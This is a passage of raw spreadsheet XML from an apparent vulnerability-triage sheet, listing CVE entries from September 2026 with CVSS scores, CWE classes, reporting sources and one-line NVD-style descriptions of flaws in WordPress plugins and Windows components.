t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-82076</t></is></c></row><row r="878"><c r="A878" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B878" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C878" s="5" t="inlineStr"><is><t>CVE-2026-84817</t></is></c><c r="D878" s="5" t="n"><v>7.1</v></c><c r="E878" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F878" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G878" s="5" t="inlineStr" /><c r="H878" s="5" t="n"><v>0.001</v></c><c r="I878" s="5" t="inlineStr" /><c r="J878" s="5" t="inlineStr" /><c r="K878" s="5" t="inlineStr" /><c r="L878" s="5" t="inlineStr" /><c r="M878" s="5" t="inlineStr" /><c r="N878" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P878" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q878" s="5" t="inlineStr" /><c r="R878" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S878" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in JetFormBuilder &lt;= 3.6.5.1 versions.</t></is></c><c r="T878" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84817</t></is></c></row><row r="879"><c r="A879" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B879" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C879" s="5" t="inlineStr"><is><t>CVE-2026-84818</t></is></c><c r="D879" s="5" t="n"><v>7.1</v></c><c r="E879" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F879" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G879" s="5" t="inlineStr" /><c r="H879" s="5" t="n"><v>0.001</v></c><c r="I879" s="5" t="inlineStr" /><c r="J879" s="5" t="inlineStr" /><c r="K879" s="5" t="inlineStr" /><c r="L879" s="5" t="inlineStr" /><c r="M879" s="5" t="inlineStr" /><c r="N879" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P879" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q879" s="5" t="inlineStr" /><c r="R879" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S879" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Open User Map &lt;= 1.4.50 versions.</t></is></c><c r="T879" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84818</t></is></c></row><row r="880"><c r="A880" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B880" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C880" s="5" t="inlineStr"><is><t>CVE-2026-84820</t></is></c><c r="D880" s="5" t="n"><v>7.1</v></c><c r="E880" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F880" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G880" s="5" t="inlineStr" /><c r="H880" s="5" t="n"><v>0.001</v></c><c r="I880" s="5" t="inlineStr" /><c r="J880" s="5" t="inlineStr" /><c r="K880" s="5" t="inlineStr" /><c r="L880" s="5" t="inlineStr" /><c r="M880" s="5" t="inlineStr" /><c r="N880" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P880" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q880" s="5" t="inlineStr" /><c r="R880" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S880" s="5" t="inlineStr"><is><t>Unauthenticated Cross Site Scripting (XSS) in Unlimited Elements For Elementor (Free Widgets, Addons, Templates) &lt;= 2.0.17 versions.</t></is></c><c r="T880" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84820</t></is></c></row><row r="881"><c r="A881" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B881" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C881" s="5" t="inlineStr"><is><t>CVE-2026-86074</t></is></c><c r="D881" s="5" t="n"><v>7.1</v></c><c r="E881" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G881" s="5" t="inlineStr" /><c r="H881" s="5" t="n"><v>0.003</v></c><c r="I881" s="5" t="inlineStr" /><c r="J881" s="5" t="inlineStr" /><c r="K881" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L881" s="5" t="inlineStr" /><c r="M881" s="5" t="inlineStr" /><c r="N881" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O881" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P881" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q881" s="5" t="inlineStr" /><c r="R881" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S881" s="5" t="inlineStr"><is><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is></c><c r="T881" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86074</t></is></c></row><row r="882"><c r="A882" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B882" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C882" s="5" t="inlineStr"><is><t>CVE-2026-86081</t></is></c><c r="D882" s="5" t="n"><v>7.1</v></c><c r="E882" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F882" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G882" s="5" t="inlineStr" /><c r="H882" s="5" t="n"><v>0.003</v></c><c r="I882" s="5" t="inlineStr" /><c r="J882" s="5" t="inlineStr" /><c r="K882" s="5" t="inlineStr" /><c r="L882" s="5" t="inlineStr" /><c r="M882" s="5" t="inlineStr" /><c r="N882" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O882" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P882" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q882" s="5" t="inlineStr" /><c r="R882" s="5" t="inlineStr"><is><t>CWE-1333</t></is></c><c r="S882" s="5" t="inlineStr"><is><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is></c><c r="T882" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86081</t></is></c></row><row r="883"><c r="A883" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B883" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C883" s="5" t="inlineStr"><is><t>CVE-2026-86713</t></is></c><c r="D883" s="5" t="n"><v>7.1</v></c><c r="E883" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F883" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G883" s="5" t="inlineStr" /><c r="H883" s="5" t="n"><v>0.004</v></c><c r="I883" s="5" t="inlineStr" /><c r="J883" s="5" t="inlineStr" /><c r="K883" s="5" t="inlineStr" /><c r="L883" s="5" t="inlineStr" /><c r="M883" s="5" t="inlineStr" /><c r="N883" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P883" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q883" s="5" t="inlineStr" /><c r="R883" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S883" s="5" t="inlineStr"><is><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is></c><c r="T883" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86713</t></is></c></row><row r="884"><c r="A884" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B884" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C884" s="5" t="inlineStr"><is><t>CVE-2026-86718</t></is></c><c r="D884" s="5" t="n"><v>7.1</v></c><c r="E884" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G884" s="5" t="inlineStr" /><c r="H884" s="5" t="n"><v>0.002</v></c><c r="I884" s="5" t="inlineStr" /><c r="J884" s="5" t="inlineStr" /><c r="K884" s="5" t="inlineStr" /><c r="L884" s="5" t="inlineStr" /><c r="M884" s="5" t="inlineStr" /><c r="N884" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P884" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q884" s="5" t="inlineStr" /><c r="R884" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S884" s="5" t="inlineStr"><is><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is></c><c r="T884" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86718</t></is></c></row><row r="885"><c r="A885" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B885" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C885" s="5" t="inlineStr"><is><t>CVE-2026-86724</t></is></c><c r="D885" s="5" t="n"><v>7.1</v></c><c r="E885" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F885" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G885" s="5" t="inlineStr" /><c r="H885" s="5" t="n"><v>0.001</v></c><c r="I885" s="5" t="inlineStr" /><c r="J885" s="5" t="inlineStr" /><c r="K885" s="5" t="inlineStr" /><c r="L885" s="5" t="inlineStr" /><c r="M885" s="5" t="inlineStr" /><c r="N885" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O885" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P885" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q885" s="5" t="inlineStr" /><c r="R885" s="5" t="inlineStr"><is><t>CWE-352</t></is></c><c r="S885" s="5" t="inlineStr"><is><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is></c><c r="T885" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86724</t></is></c></row><row r="886"><c r="A886" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B886" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C886" s="5" t="inlineStr"><is><t>CVE-2026-86725</t></is></c><c r="D886" s="5" t="n"><v>7.1</v></c><c r="E886" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G886" s="5" t="inlineStr" /><c r="H886" s="5" t="n"><v>0.003</v></c><c r="I886" s="5" t="inlineStr" /><c r="J886" s="5" t="inlineStr" /><c r="K886" s="5" t="inlineStr" /><c r="L886" s="5" t="inlineStr" /><c r="M886" s="5" t="inlineStr" /><c r="N886" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P886" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q886" s="5" t="inlineStr" /><c r="R886" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S886" s="5" t="inlineStr"><is><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is></c><c r="T886" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86725</t></is></c></row><row r="887"><c r="A887" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B887" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C887" s="5" t="inlineStr"><is><t>CVE-2026-86734</t></is></c><c r="D887" s="5" t="n"><v>7.1</v></c><c r="E887" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F887" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G887" s="5" t="inlineStr" /><c r="H887" s="5" t="n"><v>0.003</v></c><c r="I887" s="5" t="inlineStr" /><c r="J887" s="5" t="inlineStr" /><c r="K887" s="5" t="inlineStr"><is><t>snipeitapp:snipe-it</t></is></c><c r="L887" s="5" t="inlineStr" /><c r="M887" s="5" t="inlineStr" /><c r="N887" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O887" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P887" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q887" s="5" t="inlineStr" /><c r="R887" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S887" s="5" t="inlineStr"><is><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is></c><c r="T887" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86734</t></is></c></row><row r="888"><c r="A888" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B888" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C888" s="5" t="inlineStr"><is><t>CVE-2026-9331</t></is></c><c r="D888" s="5" t="n"><v>7.1</v></c><c r="E888" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F888" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G888" s="5" t="inlineStr" /><c r="H888" s="5" t="n"><v>0.002</v></c><c r="I888" s="5" t="inlineStr" /><c r="J888" s="5" t="inlineStr" /><c r="K888" s="5" t="inlineStr" /><c r="L888" s="5" t="inlineStr" /><c r="M888" s="5" t="inlineStr" /><c r="N888" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P888" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q888" s="5" t="inlineStr" /><c r="R888" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S888" s="5" t="inlineStr"><is><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is></c><c r="T888" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-9331</t></is></c></row><row r="889"><c r="A889" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B889" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C889" s="5" t="inlineStr"><is><t>CVE-2026-50349</t></is></c><c r="D889" s="5" t="n"><v>7</v></c><c r="E889" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F889" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G889" s="5" t="inlineStr" /><c r="H889" s="5" t="n"><v>0.002</v></c><c r="I889" s="5" t="inlineStr" /><c r="J889" s="5" t="inlineStr" /><c r="K889" s="5" t="inlineStr" /><c r="L889" s="5" t="inlineStr" /><c r="M889" s="5" t="inlineStr" /><c r="N889" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O889" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P889" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q889" s="5" t="inlineStr" /><c r="R889" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S889" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Ancillary Function Driver for WinSock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T889" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-50349</t></is></c></row><row r="890"><c r="A890" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B890" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C890" s="5" t="inlineStr"><is><t>CVE-2026-58848</t></is></c><c r="D890" s="5" t="n"><v>7</v></c><c r="E890" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F890" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G890" s="5" t="inlineStr" /><c r="H890" s="5" t="n"><v>0.001</v></c><c r="I890" s="5" t="inlineStr" /><c r="J890" s="5" t="inlineStr" /><c r="K890" s="5" t="inlineStr" /><c r="L890" s="5" t="inlineStr" /><c r="M890" s="5" t="inlineStr" /><c r="N890" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P890" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q890" s="5" t="inlineStr" /><c r="R890" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="S890" s="5" t="inlineStr"><is><t>In multiple functions of alloc.c, there is a possible unauthorized read/write access due to a race condition. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T890" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58848</t></is></c></row><row r="891"><c r="A891" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B891" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C891" s="5" t="inlineStr"><is><t>CVE-2026-62653</t></is></c><c r="D891" s="5" t="n"><v>7</v></c><c r="E891" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F891" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G891" s="5" t="inlineStr" /><c r="H891" s="5" t="n"><v>0.002</v></c><c r="I891" s="5" t="inlineStr" /><c r="J891" s="5" t="inlineStr" /><c r="K891" s="5" t="inlineStr" /><c r="L891" s="5" t="inlineStr" /><c r="M891" s="5" t="inlineStr" /><c r="N891" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O891" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P891" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q891" s="5" t="inlineStr" /><c r="R891" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S891" s="5" t="inlineStr"><is><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is></c><c r="T891" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62653</t></is></c></row><row r="892"><c r="A892" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B892" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C892" s="5" t="inlineStr"><is><t>CVE-2026-62654</t></is></c><c r="D892" s="5" t="n"><v>7</v></c><c r="E892" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F892" s="5" t="inlineStr"><is><t>productcert@siemens.com</t></is></c><c r="G892" s="5" t="inlineStr" /><c r="H892" s="5" t="n"><v>0.001</v></c><c r="I892" s="5" t="inlineStr" /><c r="J892" s="5" t="inlineStr" /><c r="K892" s="5" t="inlineStr" /><c r="L892" s="5" t="inlineStr" /><c r="M892" s="5" t="inlineStr" /><c r="N892" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P892" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q892" s="5" t="inlineStr" /><c r="R892" s="5" t="inlineStr"><is><t>CWE-494</t></is></c><c r="S892" s="5" t="inlineStr"><is><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is></c><c r="T892" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62654</t></is></c></row><row r="893"><c r="A893" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B893" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C893" s="5" t="inlineStr"><is><t>CVE-2026-62694</t></is></c><c r="D893" s="5" t="n"><v>7</v></c><c r="E893" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F893" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G893" s="5" t="inlineStr" /><c r="H893" s="5" t="n"><v>0.003</v></c><c r="I893" s="5" t="inlineStr" /><c r="J893" s="5" t="inlineStr" /><c r="K893" s="5" t="inlineStr" /><c r="L893" s="5" t="inlineStr" /><c r="M893" s="5" t="inlineStr" /><c r="N893" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O893" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P893" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q893" s="5" t="inlineStr" /><c r="R893" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S893" s="5" t="inlineStr"><is><t>Use after free in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T893" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-62694</t></is></c></row><row r="894"><c r="A894" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B894" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C894" s="5" t="inlineStr"><is><t>CVE-2026-68824</t></is></c><c r="D894" s="5" t="n"><v>7</v></c><c r="E894" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F894" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G894" s="5" t="inlineStr" /><c r="H894" s="5" t="n"><v>0.002</v></c><c r="I894" s="5" t="inlineStr" /><c r="J894" s="5" t="inlineStr" /><c r="K894" s="5" t="inlineStr" /><c r="L894" s="5" t="inlineStr" /><c r="M894" s="5" t="inlineStr" /><c r="N894" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P894" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q894" s="5" t="inlineStr" /><c r="R894" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S894" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T894" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68824</t></is></c></row><row r="895"><c r="A895" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B895" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C895" s="5" t="inlineStr"><is><t>CVE-2026-68825</t></is></c><c r="D895" s="5" t="n"><v>7</v></c><c r="E895" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F895" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G895" s="5" t="inlineStr" /><c r="H895" s="5" t="n"><v>0.003</v></c><c r="I895" s="5" t="inlineStr" /><c r="J895" s="5" t="inlineStr" /><c r="K895" s="5" t="inlineStr" /><c r="L895" s="5" t="inlineStr" /><c r="M895" s="5" t="inlineStr" /><c r="N895" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O895" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P895" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q895" s="5" t="inlineStr" /><c r="R895" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S895" s="5" t="inlineStr"><is><t>Use after free in Windows Bind Filter Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T895" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68825</t></is></c></row><row r="896"><c r="A896" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B896" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C896" s="5" t="inlineStr"><is><t>CVE-2026-68837</t></is></c><c r="D896" s="5" t="n"><v>7</v></c><c r="E896" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F896" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G896" s="5" t="inlineStr" /><c r="H896" s="5" t="n"><v>0.002</v></c><c r="I896" s="5" t="inlineStr" /><c r="J896" s="5" t="inlineStr" /><c r="K896" s="5" t="inlineStr" /><c r="L896" s="5" t="inlineStr" /><c r="M896" s="5" t="inlineStr" /><c r="N896" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O896" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P896" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q896" s="5" t="inlineStr" /><c r="R896" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S896" s="5" t="inlineStr"><is><t>Use after free in Windows File History Service allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T896" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68837</t></is></c></row><row r="897"><c r="A897" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B897" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C897" s="5" t="inlineStr"><is><t>CVE-2026-68840</t></is></c><c r="D897" s="5" t="n"><v>7</v></c><c r="E897" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F897" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G897" s="5" t="inlineStr" /><c r="H897" s="5" t="n"><v>0.002</v></c><c r="I897" s="5" t="inlineStr" /><c r="J897" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K89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97" s="5" t="inlineStr" /><c r="M897" s="5" t="inlineStr" /><c r="N897" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O897" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P897" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q897" s="5" t="inlineStr" /><c r="R897" s="5" t="inlineStr"><is><t>CWE-362, CWE-416</t></is></c><c r="S897" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows USB Driver allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T897" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68840</t></is></c></row><row r="898"><c r="A898" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B898" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C898" s="5" t="inlineStr"><is><t>CVE-2026-68847</t></is></c><c r="D898" s="5" t="n"><v>7</v></c><c r="E898" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F898" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G898" s="5" t="inlineStr" /><c r="H898" s="5" t="n"><v>0.002</v></c><c r="I898" s="5" t="inlineStr" /><c r="J898" s="5" t="inlineStr" /><c r="K898" s="5" t="inlineStr" /><c r="L898" s="5" t="inlineStr" /><c r="M898" s="5" t="inlineStr" /><c r="N898" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P898" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q898" s="5" t="inlineStr" /><c r="R898" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S898" s="5" t="inlineStr"><is><t>Use after free in Windows Connected User Experiences and Telemetry allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T898" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68847</t></is></c></row><row r="899"><c r="A899" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B899" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C899" s="5" t="inlineStr"><is><t>CVE-2026-68884</t></is></c><c r="D899" s="5" t="n"><v>7</v></c><c r="E899" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F899" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G899" s="5" t="inlineStr" /><c r="H899" s="5" t="n"><v>0.003</v></c><c r="I899" s="5" t="inlineStr" /><c r="J899" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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99" s="5" t="inlineStr" /><c r="M899" s="5" t="inlineStr" /><c r="N899" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O899" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P899" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q899" s="5" t="inlineStr" /><c r="R899" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S899" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Kernel allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T899" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68884</t></is></c></row><row r="900"><c r="A900" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B900" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C900" s="5" t="inlineStr"><is><t>CVE-2026-68897</t></is></c><c r="D900" s="5" t="n"><v>7</v></c><c r="E900" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F900" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G900" s="5" t="inlineStr" /><c r="H900" s="5" t="n"><v>0.002</v></c><c r="I900" s="5" t="inlineStr" /><c r="J900" s="5" t="inlineStr" /><c r="K900" s="5" t="inlineStr" /><c r="L900" s="5" t="inlineStr" /><c r="M900" s="5" t="inlineStr" /><c r="N900" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O900" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P900" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q900" s="5" t="inlineStr" /><c r="R900" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S900" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="T900" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68897</t></is></c></row><row r="901"><c r="A901" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B901" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C901" s="5" t="inlineStr"><is><t>CVE-2026-69275</t></is></c><c r="D901" s="5" t="n"><v>7</v></c><c r="E901" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F901" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G901" s="5" t="inlineStr" /><c r="H901" s="5" t="n"><v>0.002</v></c><c r="I901" s="5" t="inlineStr" /><c r="J901" s="5" t="inlineStr" /><c r="K901" s="5" t="inlineStr" /><c r="L901" s="5" t="inlineStr" /><c r="M901" s="5" t="inlineStr" /><c r="N901" 